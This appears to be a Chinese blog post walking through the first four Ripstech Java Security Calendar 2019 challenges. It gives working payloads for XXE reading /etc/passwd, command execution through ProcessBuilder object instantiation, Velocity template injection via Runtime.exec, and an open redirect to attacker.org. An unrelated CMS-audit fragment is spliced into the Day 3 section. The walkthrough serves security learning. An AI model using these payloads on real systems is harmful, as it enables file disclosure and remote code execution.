Ripstech Java Security 2019 Calendar复现系列(一) | Sunbet
登录
  • 欢迎进入Sunbet!
  • 如果您觉得Sunbet对你有帮助,那么赶紧使用Ctrl+D 收藏Sunbet并分享出去吧
  • 您好,这里是Sunbet!

Ripstech Java Security 2019 Calendar复现系列(一)

Sunbet_安全防护 申博 71次浏览 已收录 0个评论

Day1 XXE之SAXBuilder解析

代码

Day 1
https://www.ripstech.com/java-security-calendar-2019/

漏洞点

漏洞产生的主要是SAXBuilder.build()这个函数易受到XXE攻击。SAXBuilder类用于解析xml,攻击者可以上传包含恶意xml的文件来发起XXE攻击。

代码中ImportDocument这个类的作用是从”uploaded_office_doc.odt”文件中读取内容,以zip格式读入。通过对该zip文件中的所有文件进行遍历,判断是否含有content.xml文件。若其中含有content.xml文件,则将其通过org.jdom2.input.SAXbuilder.build()进行解析,若content.xml为恶意的xml文件,则产生XXE。

复现过程

1. 环境

  • IDEA+Maven

2. 添加Main函数

Day1.java

package com.ananaskr.day1;

import org.jdom2.JDOMException;
import java.io.IOException;
public class TestDay1 {
    public static void main(String[] args) throws IOException, JDOMException {
        ImportDocument test = new ImportDocument();
        System.out.println(test.extractString());
    }
}

3. 构造uploaded_office_doc.odt

.odt结尾的文件即开放文档格式,是一种规范。一个开放文档实际上也是一个ZIP文件,包含着多种资源。

content.xml

<?xml version="1.0" ?>
<!DOCTYPE foo [
    <!ELEMENT text ANY >
    <!ENTITY xxe SYSTEM "file:///etc/passwd" >

]>
<foo>&xxe;</foo>

将content.xml打包成zip格式,然后更名为uploaded_office_doc.odt,放入与项目jar包所在的目录下。

4. 结果

在项目中,将其进行mvn打包,然后运行java -jar day1-1.0-SNAPSHOT.jar,结果如下

Ripstech Java Security 2019 Calendar复现系列(一)

Day2 任意对象实例化

代码

Day 2
https://www.ripstech.com/java-security-calendar-2019/

漏洞点

代码中存在漏洞的点主要在MainController方法,它会先判断参数controllerName的值是否为”MainController”。若不是,则会从data参数构造一个新的对象,且task参数作为对象的函数名,在对象上执行。而代码中的这些参数值都是攻击者可控的,因此,可以达到实例化任意对象,调用任何不带参数的函数。

复现过程

1. 环境

  • IDEA+Maven

2. 添加Main函数

Day2.java

package com.ananaskr.day2;

import java.io.IOException;

public class day2 {
    public static void main(String[] args) throws IOException {
        String rawJson = "{\"controller\":\"java.lang.ProcessBuilder\",\"task\":\"start\",\"data\":[\"touch\",\"hacked.jsp\"]}";
        MainController con = new MainController(rawJson);

    }
}

3. 构造payload

rawJson的值是json格式的字符串。可以通过实例化ProcessBuilder类来创建操作系统进程,达到任意命令执行。其中该类的start()方法会调用command命令列表和参数。data中是一个array,表示start()方法调用的command命令列表和参数。因此,构造的payload如下

{"controller":"java.lang.ProcessBuilder","task":"start","data":["touch","hacked.jsp"]}

4. 结果

在项目中,将其进行mvn打包,然后运行java -jar day1-1.0-SNAPSHOT.jar,结果如下
Ripstech Java Security 2019 Calendar复现系列(一)

Day3 Velocity模版注入

代码

Day 3
https://www.ripstech.com/java-security-calendar-2019/

代码审计之lvyecms后台getshell

准备审计 码云上下载最新的lvyecms 地址:https://gitee.com/lvyecms/lvyecms?_from=gitee_searchs 审计开始 首先看网站目录结构 找到入口文件 index.php 标准的thinkphp3.2风格,具体介绍见官方文档:http://document.thinkphp.cn/manual_3_2.html 进入lvyecms/Application目录,查看存在哪些模块 一般进行代码审计时,先看前台代码,再看后台代码,但lvyecms都是需要后台权限的模块,所以不用管先后顺序,直接看Template模块 审计Template模块代码,可以发现自定义页面 //增加自定义页面
public function add() {
if (IS_POST) {
$model = D(‘Template/Customtemp’);
if (

漏洞点

代码中的velocity.evaluate()函数,用来在运行时动态解析模版语言,因此,若传入的是Java代码,即可执行Java代码。而fragment参数是可由攻击者控制的,fragment参数值会被Velocity当作Java代码执行,因此可导致代码注入漏洞。

复现过程

1. 环境

  • IDEA+maven-archetype-webapp

2. 修正代码

由于在IDEA中直接放入这个类会报错,将第9行的final关键字去掉,且在render函数后加上返回值。

3. 添加Main函数

Day3.java

package com.ananaskr.day3;

import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;

public class day3 extends HttpServlet {

    public void init() throws ServletException{
    }

    public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException{
        TemplateRenderer temp = new TemplateRenderer();
        temp.render(req,res);
    }

    public void destroy(){

    }

}

4. 配置web.xml

web.xml

<!DOCTYPE web-app PUBLIC
 "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
 "http://java.sun.com/dtd/web-app_2_3.dtd" >

<web-app>
  <display-name>Archetype Created Web Application</display-name>
  <servlet>
    <servlet-name>TemplateRenderer</servlet-name>
    <servlet-class>com.ananaskr.day3.Day3</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>TemplateRenderer</servlet-name>
    <url-pattern>/day3</url-pattern>
  </servlet-mapping>
</web-app>

5. 构造payload

这种模版注入的限制是攻击者不能执行Java代码。因此,需要使用Java反射机制来访问Java类最终达到执行任意命令。

Java反射机制是指在运行状态中,对于任意一个类,都能够知道这个类的所有属性和方法;对于任意一个对象,都能够调用它的任意一个方法和属性。这种动态获取信息以及动态调用对象的方法的功能称为java语言的反射机制。

Velocity指令以#开头,后面跟一个关键字,例如#set指令,其功能是向一个变量或属性赋值。首先将一个变量$s赋值为空,即#set($s=””),然后再向一个变量$stringClass赋值为前一个变量的对象调用,获取基类,这个基类有”Java.lang.Runtime”的类对象。

payload最终如下:

user=&temp=#set($s="")#set($stringClass=$s.getClass().forName("java.lang.Runtime").getRuntime().exec("touch hacked.jsp"))$stringClass

将其escape后,完整的payload

http://localhost:8080/day31/day3?user=&temp=%23set%28%24s%3D%22%22%29%23set%28%24stringClass%3D%24s.getClass%28%29.forName%28%22java.lang.Runtime%22%29.getRuntime%28%29.exec%28%22touch%20hacked.jsp%22%29%29%24stringClass

6. 结果

Ripstech Java Security 2019 Calendar复现系列(一)

Day4 开放重定向漏洞

代码

Day 3
https://www.ripstech.com/java-security-calendar-2019/

漏洞点

代码中url参数是由攻击者可控的,然后在经过startsWith(“/”)的判断后,进行sendRedirect()函数进行跳转。本来startsWith(“/”)的判断是为了保证跳转的url是一个相对路径在本域下,然而以/开头的url并非只有相对路径才可以,例如//attacker.org是一个不带scheme的绝对路径URI,在进行跳转时,会直接跳转到http://attacker.org。

复现过程

1. 环境

  • IDEA+maven-archetype-webapp

2. 修正代码

  • 添加异常处理

3. 配置web.xml

web.xml

<servlet>
    <servlet-name>login</servlet-name>
    <servlet-class>com.ananaskr.day4.Login</servlet-class>
  </servlet>

  <servlet-mapping>
    <servlet-name>login</servlet-name>
    <url-pattern>/login</url-pattern>
  </servlet-mapping>
</web-app>

4. payload构造

post的内容为

url=//attacker.org

5. 结果

Ripstech Java Security 2019 Calendar复现系列(一)


Sunbet|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明Ripstech Java Security 2019 Calendar复现系列(一)
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址